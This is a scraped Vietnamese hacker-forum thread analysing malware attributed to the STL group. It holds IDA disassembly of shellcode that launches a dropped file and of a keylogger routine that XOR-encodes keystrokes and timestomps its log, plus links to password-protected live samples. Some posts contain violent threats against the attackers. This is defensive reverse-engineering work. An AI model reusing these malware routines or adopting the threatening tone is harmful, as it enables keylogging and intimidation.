debug008:001490EB  6A0 jnz     @@Terminate
debug008:001490EB
debug008:001490F1  6A0 mov     [ebp+szCreateProcessW], 'aerC'
debug008:001490FB  6A0 mov     [ebp+var_3D8], 'rPet'
debug008:00149105  6A0 mov     [ebp+var_3D4], 'seco'
debug008:0014910F  6A0 mov     [ebp+var_3D0], 'Ws'
debug008:00149118  6A0 mov     [ebp+var_3CE], 0
debug008:0014911F  6A0 mov     [ebp+CreateProcessW], 0
debug008:00149129  6A0 lea     eax, [ebp+szCreateProcessW]
debug008:0014912F  6A0 push    eax
debug008:00149130  6A4 push    [ebp+hKernel32]
debug008:00149136  6A8 call    [ebp+GetProcAddress]
debug008:00149136
debug008:0014913C  6A8 cmp     eax, 0
debug008:0014913F  6A8 jz      short @@Terminate
debug008:0014913F
debug008:00149141  6A8 mov     [ebp+CreateProcessW], eax
debug008:00149147  6A8 push    44h
debug008:00149149  6AC lea     eax, [ebp+buffer1]
debug008:0014914F  6AC push    eax
debug008:00149150  6B0 call    [ebp+RtlZeroMemory]
debug008:00149150
debug008:00149156  6B0 mov     eax, 44h
debug008:0014915B  6B0 mov     [ebp+buffer1], eax
debug008:00149161  6B0 push    10h
debug008:00149163  6B4 lea     eax, [ebp+buffer2]
debug008:00149169  6B4 push    eax
debug008:0014916A  6B8 call    [ebp+RtlZeroMemory]
debug008:0014916A
debug008:00149170  6B8 lea     eax, [ebp+buffer2]
debug008:00149176  6B8 push    eax
debug008:00149177  6BC lea     eax, [ebp+buffer1]
debug008:0014917D  6BC push    eax
debug008:0014917E  6C0 push    0
debug008:00149180  6C4 push    0
debug008:00149182  6C8 push    0
debug008:00149184  6CC push    0
debug008:00149186  6D0 push    0
debug008:00149188  6D4 push    0
debug008:0014918A  6D8 push    0
debug008:0014918C  6DC lea     eax, [ebp+szTempDir]
debug008:00149192  6DC push    eax
debug008:00149193  6E0 call    [ebp+CreateProcessW]
debug008:00149193
debug008:00149199
debug008:00149199      @@Terminate:                            ; CODE XREF: ShellcodeProc+481j
debug008:00149199                                              ; ShellcodeProc+4B6j
debug008:00149199                                              ; ShellcodeProc+4D8j
debug008:00149199                                              ; ShellcodeProc+4FAj
debug008:00149199                                              ; ShellcodeProc+51Cj
debug008:00149199                                              ; ShellcodeProc+56Fj
debug008:00149199                                              ; ShellcodeProc+5C3j
debug008:00149199  6E0 mov     [ebp+szTerminateProcess], 'mreT'
debug008:001491A3  6E0 mov     [ebp+var_464], 'tani'
debug008:001491AD  6E0 mov     [ebp+var_460], 'orPe'
debug008:001491B7  6E0 mov     [ebp+var_45C], 'ssec'
debug008:001491C1  6E0 mov     [ebp+var_458], 0
debug008:001491C8  6E0 lea     eax, [ebp+szTerminateProcess]
debug008:001491CE  6E0 push    eax
debug008:001491CF  6E4 push    [ebp+hKernel32]
debug008:001491D5  6E8 call    [ebp+GetProcAddress]
debug008:001491D5
debug008:001491DB  6E8 push    0
debug008:001491DD  6EC push    0FFFFFFFFh
debug008:001491DF  6F0 call    eax
debug008:001491DF
debug008:001491E1  6F0 retn
Thôi em tạm nghỉ đây, lúc khác em sẽ post tiếp về các keylog và bot của STL. Toàn bộ hình ảnh ở trên, file virus.doc và virus.exe, IDA 5.5 database, em post ở đây: http://www.mediafire.com/?ydsa6auc6v1asxj Password=malware Các file đã up virus.doc.bin và virus.exe em đã xoá, năm trong file HVAPost.rar hết.]]>
/hvaonline/posts/list/38818.html#237682 /hvaonline/posts/list/38818.html#237682 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237698 /hvaonline/posts/list/38818.html#237698 GMT RCE đám virus của Sinh Tử Lệnh. http://www.mediafire.com/?ubbeuryp38jc7qk. Password như cũ: malware. Anh em nào có IDA 5.5 trở lên có thể tiếp tục phân tích. 2 file keylog này tới nay KAV của em vẫn không detect ra. Điều này chứng tỏ điều gì, các anh em suy nghĩ thử ????? Các keylog và bot của STL đều có chung đặc điểm là: 1. Code = Visual C++ đời mới 2008, 2010 2. Dùng PE Compact để compress dll, exe file. (Nói nhỏ nhé: PE Compact nhét watermark về user trong file compacted đấy. Tiêu tụi mày rồi, nhưng nếu tui mày xài PE Compact cờ rắc thì em thua). 3. Export fake API COM DLL: DllCanUnloadNow, DllGetClassObject, DllRegisterServer, DllUnregisterServer. Các hàm này đa số đều return FALSE, chỉ 1 vài hàm làm công việc chính: keylog, inject... Em sẽ post tool để detect PE private info như: Date compile, source directory, compiler&linker version, MS Rich information lên sau. Tool này chỉ private share, có thể khi detect ra nó đụng chạm nhiều lắm. Phân tích các keylog này các bạn sẽ xác định được host của STL mà các keylog up key data lên. Tụi này dùng thuật toán mã hoá để mã hoác các URL string bèo lắm (lại sorry mấy đại ca STL nhé, em có gì sai sót bỏ qua nhé, đừng hại em !!!???). PS: Khách đâu mà lắm thế ??? Nếu hồi đó máy em có install Firewall xịn thì chắc đã không bị dính đòn tụi này rồi. Mấy lần install Comodo rồi lại uninstall ra, thấy nặng thêm máy, phiền phức quá. Kinh nghiệm rút ra: Không tin bất cứ file gì download về, phải scan, RCE, forrensic trước. Còn một vấn đề nữa, em nói luôn, nhờ ai đó giỏi tiếng Anh hay anh conmale gởi giùm file .doc đó cho MS để họ kiểm tra và fix bug (nếu có). Chứ em mà gởi thì tụi MS bò ra mà đọc tiếng Anh cùi của em, cười bể bụng thì sao. Rồi đám STL nhảy vào la làng mày cướp công của tao !!!???]]> /hvaonline/posts/list/38818.html#237699 /hvaonline/posts/list/38818.html#237699 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237704 /hvaonline/posts/list/38818.html#237704 GMT RCE đám virus của Sinh Tử Lệnh.
Cũng là santrex.net (đã đề cập nhiều lần trong chủ đề "Vài thông tin về nhóm STL" trong mục "Các chủ đề khác") ;).]]>
/hvaonline/posts/list/38818.html#237727 /hvaonline/posts/list/38818.html#237727 GMT
RCE đám virus của Sinh Tử Lệnh.

conmale wrote:
Bài phân tích rất đã. Cám ơn TQN. Anh đã thay thể hình trên imagehacks với hình upload thẳng lên HVA để khỏi sợ mất hình minh hoạ. PS: em đang "vẽ đường cho hưu chạy"... rông hay chạy vô tròng vậy? -:-)  
Sao chả thấy hình đâu cả, bác conmale ơi? Edit: Giờ mới thấy :)]]>
/hvaonline/posts/list/38818.html#237730 /hvaonline/posts/list/38818.html#237730 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237741 /hvaonline/posts/list/38818.html#237741 GMT RCE đám virus của Sinh Tử Lệnh.

alakay wrote:
Anh quanta cho biết các câu lện thực hiện đựoc không, hi hi :D. 
Lệnh gì bạn? Mình "nghịch" cho biết vậy thôi chứ cái này chưa đủ trình để ngâm cứu.]]>
/hvaonline/posts/list/38818.html#237745 /hvaonline/posts/list/38818.html#237745 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237747 /hvaonline/posts/list/38818.html#237747 GMT RCE đám virus của Sinh Tử Lệnh.

quanta wrote:

alakay wrote:
Anh quanta cho biết các câu lện thực hiện đựoc không, hi hi :D. 
Lệnh gì bạn? Mình "nghịch" cho biết vậy thôi chứ cái này chưa đủ trình để ngâm cứu. 
Thì các câu lệnh giải nén, objdump ... em sợ làm o đúng lại bị dính chưởng :D.]]>
/hvaonline/posts/list/38818.html#237748 /hvaonline/posts/list/38818.html#237748 GMT
RCE đám virus của Sinh Tử Lệnh.

alakay wrote:
Thì các câu lệnh giải nén, objdump ... em sợ làm o đúng lại bị dính chưởng :D. 
Sợ dính chưởng thì làm trên Máy ảo hoặc... nghỉ làm @TQN: bài phân tích quá đã, đọc sáng ra nhiều điều về Reverse ( mặc dù tớ là dân ngoại đạo về Reverse )]]>
/hvaonline/posts/list/38818.html#237755 /hvaonline/posts/list/38818.html#237755 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237825 /hvaonline/posts/list/38818.html#237825 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237847 /hvaonline/posts/list/38818.html#237847 GMT RCE đám virus của Sinh Tử Lệnh.

quanta wrote:
Mình đang "quậy" trên Linux với: ghex2, okteta, bvi, xxd, objcopy, objdump, ... và đang thắc mắc ở một chỗ: sau khi copy đoạn hex từ 0xEE8D4 tới 0xEEF39, tạo ngược lại file .bin, sau đó không chuyển thành .exe mà lại thành .elf rồi load vào Evan's Debugger http://www.codef00.com/projects) thì liệu mình vẫn có thể debug ra URL kia được không? 
Về bản chất thì được, bởi vì đoạn shellcode được viết bằng mã máy mà :D ]]>
/hvaonline/posts/list/38818.html#237860 /hvaonline/posts/list/38818.html#237860 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237875 /hvaonline/posts/list/38818.html#237875 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237891 /hvaonline/posts/list/38818.html#237891 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237939 /hvaonline/posts/list/38818.html#237939 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237942 /hvaonline/posts/list/38818.html#237942 GMT RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Gởi tụi STL: 1. Tụi mày lớn hơn tao không mà xưng anh với tao ? 2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à. 3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm. 4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN. 5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ? 6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày. Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ? PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé ! 
(6) Đúng như vậy! Biết được username và password của người nào đó để vào đươc website của một ngân hàng Việt nam, thí dụ Vietcombank, thì chỉ biết được các thông tin sau: - Số tài khoản mà người đó đang dùng và đã từng dùng - Số dư trên tài khoản và giá trị có thể giao dịch trong số dư - Số lần và giá trị giao dịch mà chủ tài khoản đã thực hiện thời gian vừa qua Còn việc rút tiền (lấy cắp tiền) ra từ tài khoản thì không thể. Vì muốn rút tiền ra từ tài khoản, người rút phải làm 1 form xin rút tiền, ký tên vào form và trình cho ngân hàng giấy chứng minh hơp lệ. Nhân viên ngân hàng thường xem kỹ CMND và kiểm tra đối chiếu rất kỹ chữ ký trên form và chữ ký lưu tại ngân hàng (khi mở tài khoản). Chưa kể các nhân viên ngân hàng thường đã rất quen mặt khách hàng (do đã tiếp xúc nhiều lần) Vì thế việc lấy đươc username và pass. vào website ngân hàng, chỉ giống như đến đươc chân núi Everest mà thôi. Ở công ty tôi, khi đi công tác xa (nơi không có mạng Internet hay 3G), tôi thường nhờ một số anh em trong cơ quan kiểm tra hộ tài khoản cho mình. Công việc và giao dịch của TQN là hoàn toàn hợp pháp nên chẳng có gí phải quan tâm. Vả lai xin ngân hàng lai username mới và pass. mới là dễ dàng. (7) Theo chỗ mình biết thì chính quyền ta không để cho STL dưa lưng đâu. Những việc làm manh đông và không hợp pháp (vi phạm quyền công dân) thì chẳng ai muốn dính vào đâu. Nhưng một chính quyền khác hay một thế lực khác (không phải "ta") thì rất có thể, (vì có những lý do của việc đó) ]]>
/hvaonline/posts/list/38818.html#237944 /hvaonline/posts/list/38818.html#237944 GMT
RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Gởi tụi STL: 1. Tụi mày lớn hơn tao không mà xưng anh với tao ? 2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à. 3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm. 4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN. 5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ? 6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày. Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ? PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé ! 
Hì hì, bình tĩnh em. Những ai ký tên STL kia ít ra cũng đã làm cho em điên tiết lên vì những tiểu xảo ngôn ngữ. Bởi vậy, đừng mất bình tĩnh trước tiểu xảo ngôn ngữ bởi vì những thứ đó không có mấy giá trị. Vả lại, chính bọn họ đã sử dụng quá nhiều "tiểu xảo ngôn ngữ" từ đầu đến cuối rồi, có gì mới mẻ đâu? :P Hãy dùng khoa học và kỹ thuật để chứng minh sự thật và tạo điều kiện để mọi người tham gia thảo luận một cách chuyên môn và bổ ích. Những việc làm này nằm ở vị trí hoàn toàn khác với những công việc ăn cắp và sử dụng tiểu xảo ngôn ngữ.]]>
/hvaonline/posts/list/38818.html#237946 /hvaonline/posts/list/38818.html#237946 GMT
RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Gởi tụi STL: 1. Tụi mày lớn hơn tao không mà xưng anh với tao ? 2. Tụi mày chơi trò quá bẩn, núp trong bóng tối, chơi trò ăn cắp pass bao nhiêu lâu rồi mà không thấy xấu hổ à. 3. Tụi mày tưởng hù doạ được tao à. Tao chỉ cần biết một thằng ngoài đời của tụi bây là thằng đó mất xác, khỏi đi tìm. 4. Mấy cái pass cho mấy cái forum, mail vớ vẫn ấy, tao PM cho tui bây cũng được, mất cái này tao tạo cái khác, tên tuổi của tao TQN thì dưới bất cứ nick gì vẫn là TQN. 5. Tui mày chơi bẩn, đợi tao đi xa mới dám tấn công à ? 6. Tui mày tưởng vào được cái xxxbank của tao là giỏi à ? Tụi mày vào đó chỉ xem được chi tiết giao dịch rút, chuyển tiền của tao chứ làm chó gì được. Muốn rút tiền của tao à ? Còn lâu, chữ ký, đt, CMND của tao không có thì đố tụi mày rút tiền được. Vậy mà còn nói dóc, vào rồi ra, để đức cho con cháu. Một ngày làm của tao bằng 10 tháng lương của 10 thằng làm ăn lương hèn hạ của tụi mày. Tao sẽ theo vụ này tới cùng, đừng để thằng nào gặp tao ngoài đường nhé, đệ của tao xả chết ráng chịu nhe. Thách cho tụi mày có chính quyền chống lưng, chơi trò rootkit, snip packet của tao ? PS: À quên, mạng của một thằng trong tụi mày cao lắm là 30 chai thôi, nhớ nhé ! 
Em báo giá lại cho anh là nếu em làm chỉ lấy 20 chai thôi, đạn AK dạo này mua rẻ vãi, có gì contact em nha :) PS: Các chú STL không biết sự vừa phải, việc làm của các chú dưới mức chấp nhận được của đạo đức căn bản, chứ đừng nói gì đến đạo đức của dân làm máy tính nói chung. Bản thân tôi rất muốn chơi công bằng với các chú đó (a.k.a Neo, a.k.a XXX ;-) ???)]]>
/hvaonline/posts/list/38818.html#237947 /hvaonline/posts/list/38818.html#237947 GMT
RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
Anh em nào đã, đang phân tích 2 file .dll keylog của STL mà em up lên mediafire ? Được gì thì post lên cho mọi người thảo luận cho đông vui, mình em độc diển buồn lắm. 
Anh có thể up lại được không, mấy link đó hình như die rồi ! :-S ]]>
/hvaonline/posts/list/38818.html#237950 /hvaonline/posts/list/38818.html#237950 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237957 /hvaonline/posts/list/38818.html#237957 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237962 /hvaonline/posts/list/38818.html#237962 GMT RCE đám virus của Sinh Tử Lệnh.

vikjava wrote:
- Xin hỏi đối với trường hợp các chương trình antivirus đều không phát hiện được, không có khả năng RCE như anh TQN. Đối với người quản trị hệ thống cần thực hiện những phương thức nào để có thể kiện toàn bảo mật cho hệ thống. 
- Có những chính sách phù hợp về user và group, nên tuân theo các nguyên tắc như tối thiểu, ràng buộc, rõ ràng. (Quản lý phân quyển chặc chẽ, không tạo ra lỗ hổng phân quyền, không cấp quyền dư hoặc thiếu, có nhiều điều kiện ràng buộc giữa các user và group như passwd, chứng thực, quản lý log rõ ràng, dễ theo dõi, ...) - Quản lý tốt các dịch vụ, giới hạn trong khuôn khổ nhất định về tài nguyên và sự can thiệp vào trong hệ thống. (Quản lý quá trình chạy, config chặt chẽ, tối ưu về dịch vụ và quản lý quyền hạn, xây dựng hệ thống firewall quản lý các port, các dòng dữ liệ vào ra, quản lý sự can thiệp vào trong các tiến trình, dịch vụ khác, sự tương tác với các dịch vụ khác) - Thường xuyên giám sát hệ thống. - Xây dựng quy trình quản lý rủi ro. Vài ý nghĩ ra thôi, có gì thiếu sót vikjava và mọi người bổ sung nhé. :) ]]>
/hvaonline/posts/list/38818.html#237965 /hvaonline/posts/list/38818.html#237965 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#237966 /hvaonline/posts/list/38818.html#237966 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238006 /hvaonline/posts/list/38818.html#238006 GMT RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238009 /hvaonline/posts/list/38818.html#238009 GMT RCE đám virus của Sinh Tử Lệnh.

quanta wrote:
Sợ các bạn phân tích không cẩn thận lại "dính chưởng" nên xoá đi rồi. 
:-O :-O :-O :-O :-O :-O :-O :-O :-O :-O Chắc không phải lý do này chứ, nếu mà lỡ có dính... cùng đường lắm thì nhờ các chuyên gia trên hva diệt giùm. Ai có mẫu up lên cho em ngó mặt một chút nhé.]]>
/hvaonline/posts/list/38818.html#238021 /hvaonline/posts/list/38818.html#238021 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238024 /hvaonline/posts/list/38818.html#238024 GMT RCE đám virus của Sinh Tử Lệnh. Tháng 5 28, 2011 10:25 AM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 5:25 PM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 12:32 PM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 1:31 AM Trình duy?t Ðang nh?p vào Mail FL, US Tháng 5 26, 2011 1:27 AM Trình duy?t Truy c?p Mail VA, US Tháng 5 26, 2011 1:22 AM Trình duy?t Ðang nh?p vào Mail VA, US Tháng 5 26, 2011 12:20 AM Trình duy?t Truy c?p Mail PA, US   Tao công nhận là tao không phải là thằng chuyên về IT, trình độ của tao thì có hạn, về nhiều lãnh vực nào đó trong IT thì không bằng tụi mày, nhưng tao không mất đạo đức, khốn nạn như tụi mày, trình độ ăn cắp, phá hoại thì "em xin gọi anh là sư phụ". Tụi mày có tài giỏi nhưng mà không có đức thì cũng không bằng thằng ăn trộm, ăn cướp ngoài đường. Dân mà bắt được tụi mày thì nó đập chết cha tui mày luôn. PS: Sorry anh em mod, admin của HVA nhé, tính em nóng như Trương Phi, tức lên là ăn nói bạt mạng. Chúng ta sẽ cùng tiếp tục phân tích đám malware của tụi "Sống Chết theo lệnh" này.
11:00 AM Trình duyệt Đăng nhập CA, US  
Chậm chân rồi mấy cu ơi. Chiều giờ, tui nó login liên tục vào mail Yahoo của em. Em sơ ý quá, quên lấy cái IP của tui nó, giờ vào thì chỉ còn log từ sáng tới giờ. Sorry anh em nhé.]]>
/hvaonline/posts/list/38818.html#238207 /hvaonline/posts/list/38818.html#238207 GMT
RCE đám virus của Sinh Tử Lệnh. /hvaonline/posts/list/38818.html#238232 /hvaonline/posts/list/38818.html#238232 GMT RCE đám virus của Sinh Tử Lệnh. http://www.mediafire.com/?24238f1vktaswu8 2. File keylog và downloader của tụi này: http://www.mediafire.com/?ashngg5ae22qj3l Cả hai file đều có pwd là: malware. Đối với keylog, anh em không cần tập trung vào HARDKBD.DLL, chỉ nên tập trung vào wbmain_.dll. File HARDKBD.DLL chỉ là một keylog bình thường (hoặc hơn bình thường một chút). Mọi key press của victim sẽ được lưu vào thành file msdata.vxd, và toàn bộ file được xor với 0x6F. Nếu trên may các bạn có một HexEditor nào đó như WinHex, 101Editor, sau khi xor với 0x6F, các bạn sẽ thấy lại nội dung nguyên bản của file này. Code:
.text:10002B70 write_xor_0x6F_to_msdata_vxd_file proc near
.text:10002B70                                         ; CODE XREF: ThreadInLogOnUIExe+E0p
.text:10002B70                                         ; sub_10001560+99p
.text:10002B70                                         ; WinLogonThreadProc+2Dp
.text:10002B70                                         ; sub_10001AB0+87p
.text:10002B70                                         ; DllRegisterServer+17Ap
.text:10002B70                                         ; DllRegisterServer:loc_10002418p
.text:10002B70                                         ; sub_10002450+1D7p
.text:10002B70                                         ; sub_10002450+20Ep
.text:10002B70                                         ; sub_10002A10+138p
.text:10002B70
.text:10002B70 NumberOfBytesWritten= dword ptr -4
.text:10002B70 hFile   = dword ptr  8
.text:10002B70 pszTxt  = dword ptr  0Ch
.text:10002B70
.text:10002B70         push    ebp
.text:10002B71         mov     ebp, esp
.text:10002B73         push    ecx
.text:10002B74         push    ebx
.text:10002B75         mov     ebx, eax
.text:10002B77         mov     eax, [ebp+pszTxt]
.text:10002B7A         test    eax, eax
.text:10002B7C         jz      @@Return_FALSE
.text:10002B7C
.text:10002B82         test    ebx, ebx
.text:10002B84         jz      @@Return_FALSE
.text:10002B84
.text:10002B8A         push    edi
.text:10002B8B         mov     edi, [ebp+hFile]
.text:10002B8E         cmp     edi, 0FFFFFFFFh
.text:10002B91         jnz     short loc_10002B9B
.text:10002B91
.text:10002B93         or      eax, edi
.text:10002B95         pop     edi
.text:10002B96         pop     ebx
.text:10002B97         mov     esp, ebp
.text:10002B99         pop     ebp
.text:10002B9A         retn
.text:10002B9A
.text:10002B9B ; ---------------------------------------------------------------------------
.text:10002B9B
.text:10002B9B loc_10002B9B:                           ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+21j
.text:10002B9B         lea     edx, [eax+1]
.text:10002B9E         mov     edi, edi
.text:10002B9E
.text:10002BA0
.text:10002BA0 @@FindLen:                              ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+35j
.text:10002BA0         mov     cl, [eax]
.text:10002BA2         inc     eax
.text:10002BA3         test    cl, cl
.text:10002BA5         jnz     short @@FindLen
.text:10002BA5
.text:10002BA7         sub     eax, edx
.text:10002BA9         jnz     short @@AllocMem
.text:10002BA9
.text:10002BAB         pop     edi
.text:10002BAC         pop     ebx
.text:10002BAD         mov     esp, ebp
.text:10002BAF         pop     ebp
.text:10002BB0         retn
.text:10002BB0
.text:10002BB1 ; ---------------------------------------------------------------------------
.text:10002BB1
.text:10002BB1 @@AllocMem:                             ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+39j
.text:10002BB1         push    esi
.text:10002BB2         push    ebx                     ; size_t
.text:10002BB3         call    operator new(uint)
.text:10002BB3
.text:10002BB8         push    ebx                     ; size_t
.text:10002BB9         mov     esi, eax
.text:10002BBB         push    0                       ; int
.text:10002BBD         push    esi                     ; void *
.text:10002BBE         call    _memset
.text:10002BBE
.text:10002BC3         add     esp, 10h
.text:10002BC6         test    ebx, ebx
.text:10002BC8         jle     short @@WriteXorData
.text:10002BC8
.text:10002BCA         mov     ecx, [ebp+pszTxt]
.text:10002BCD         mov     eax, esi
.text:10002BCF         sub     ecx, esi
.text:10002BD1         mov     edi, ebx
.text:10002BD1
.text:10002BD3
.text:10002BD3 @@XorLoop:                              ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+6Dj
.text:10002BD3         mov     dl, [ecx+eax]
.text:10002BD6         xor     dl, 6Fh
.text:10002BD9         mov     [eax], dl
.text:10002BDB         inc     eax
.text:10002BDC         dec     edi
.text:10002BDD         jnz     short @@XorLoop
.text:10002BDD
.text:10002BDF         mov     edi, [ebp+hFile]
.text:10002BDF
.text:10002BE2
.text:10002BE2 @@WriteXorData:                         ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+58j
.text:10002BE2         push    2                       ; dwMoveMethod
.text:10002BE4         push    0                       ; lpDistanceToMoveHigh
.text:10002BE6         push    0                       ; lDistanceToMove
.text:10002BE8         push    edi                     ; hFile
.text:10002BE9         mov     [ebp+NumberOfBytesWritten], 0
.text:10002BF0         call    ds:SetFilePointer       ; Moves the file pointer of an open file.
.text:10002BF0
.text:10002BF6         push    0                       ; lpOverlapped
.text:10002BF8         lea     eax, [ebp+NumberOfBytesWritten]
.text:10002BFB         push    eax                     ; lpNumberOfBytesWritten
.text:10002BFC         push    ebx                     ; nNumberOfBytesToWrite
.text:10002BFD         push    esi                     ; lpBuffer
.text:10002BFE         push    edi                     ; hFile
.text:10002BFF         call    ds:WriteFile            ; Writes data to a file and is designed for both synchronous and asynchronous operation.
.text:10002BFF                                         ; The function starts writing data to the file at the position indicated by the file pointer.
.text:10002BFF
.text:10002C05         mov     ebx, eax
.text:10002C07         test    edi, edi
.text:10002C09         jz      short @@Return_TRUE
.text:10002C09
.text:10002C0B         cmp     dword_10021914, 0
.text:10002C12         jnz     short @@ChangeTime
.text:10002C12
.text:10002C14         call    FindAndGetTimeOfWinLogonExe
.text:10002C14
.text:10002C19         test    eax, eax
.text:10002C1B         jz      short @@Return_TRUE
.text:10002C1B
.text:10002C1D
.text:10002C1D @@ChangeTime:                           ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+A2j
.text:10002C1D         push    offset WinLogonExe_LastWriteTime ; lpLastWriteTime
.text:10002C22         push    offset WinLogonExe_LastAccessTime ; lpLastAccessTime
.text:10002C27         push    offset WinLogonExe_CreationTime ; lpCreationTime
.text:10002C2C         push    edi                     ; hFile
.text:10002C2D         call    ds:SetFileTime          ; Sets the date and time that a file was created, last accessed, or last modified.
.text:10002C2D
.text:10002C33
.text:10002C33 @@Return_TRUE:                          ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+99j
.text:10002C33                                         ; write_xor_0x6F_to_msdata_vxd_file+ABj
.text:10002C33         push    esi
.text:10002C34         call    operator_free
.text:10002C34
.text:10002C39         add     esp, 4
.text:10002C3C         pop     esi
.text:10002C3D         pop     edi
.text:10002C3E         mov     eax, ebx
.text:10002C40         pop     ebx
.text:10002C41         mov     esp, ebp
.text:10002C43         pop     ebp
.text:10002C44         retn
.text:10002C44
.text:10002C45 ; ---------------------------------------------------------------------------
.text:10002C45
.text:10002C45 @@Return_FALSE:                         ; CODE XREF: write_xor_0x6F_to_msdata_vxd_file+Cj
.text:10002C45                                         ; write_xor_0x6F_to_msdata_vxd_file+14j
.text:10002C45         xor     eax, eax
.text:10002C47         pop     ebx
.text:10002C48         mov     esp, ebp
.text:10002C4A         pop     ebp
.text:10002C4B         retn
.text:10002C4B
.text:10002C4B write_xor_0x6F_to_msdata_vxd_file endp
PS: Mọi người nên cẩn thận các trình gỏ tiếng Việt mà mình đang dùng: Unikey, Vietkey. Nếu search trong máy có file msdata.vxd thì các bạn đã bị nhiểm keylog của tụi: "Sống Chết nghe theo lệnh" này. Tiếp theo, em sẽ post tiếp RCE của file wbmain.dll. ]]>
/hvaonline/posts/list/38818.html#238234 /hvaonline/posts/list/38818.html#238234 GMT
RCE đám virus của Sinh Tử Lệnh.

TQN wrote:
................................ - Kiểm tra khi tao đi, thằng nào login vào hộp mail yahoo của tao. À thì ra tụi mày có thằng ở bên US à:
Tháng 5 28, 2011 10:25 AM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 5:25 PM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 12:32 PM Trình duy?t Ðang nh?p vào Mail PA, US Tháng 5 26, 2011 1:31 AM Trình duy?t Ðang nh?p vào Mail FL, US Tháng 5 26, 2011 1:27 AM Trình duy?t Truy c?p Mail VA, US Tháng 5 26, 2011 1:22 AM Trình duy?t Ðang nh?p vào Mail VA, US Tháng 5 26, 2011 12:20 AM Trình duy?t Truy c?p Mail PA, US  
.................................................. Chúng ta sẽ cùng tiếp tục phân tích đám malware của tụi "Sống Chết theo lệnh" này.
11:00 AM Trình duyệt Đăng nhập CA, US  
Chậm chân rồi mấy cu ơi. Chiều giờ, tui nó login liên tục vào mail Yahoo của em. Em sơ ý quá, quên lấy cái IP của tui nó, giờ vào thì chỉ còn log từ sáng tới giờ. Sorry anh em nhé. 
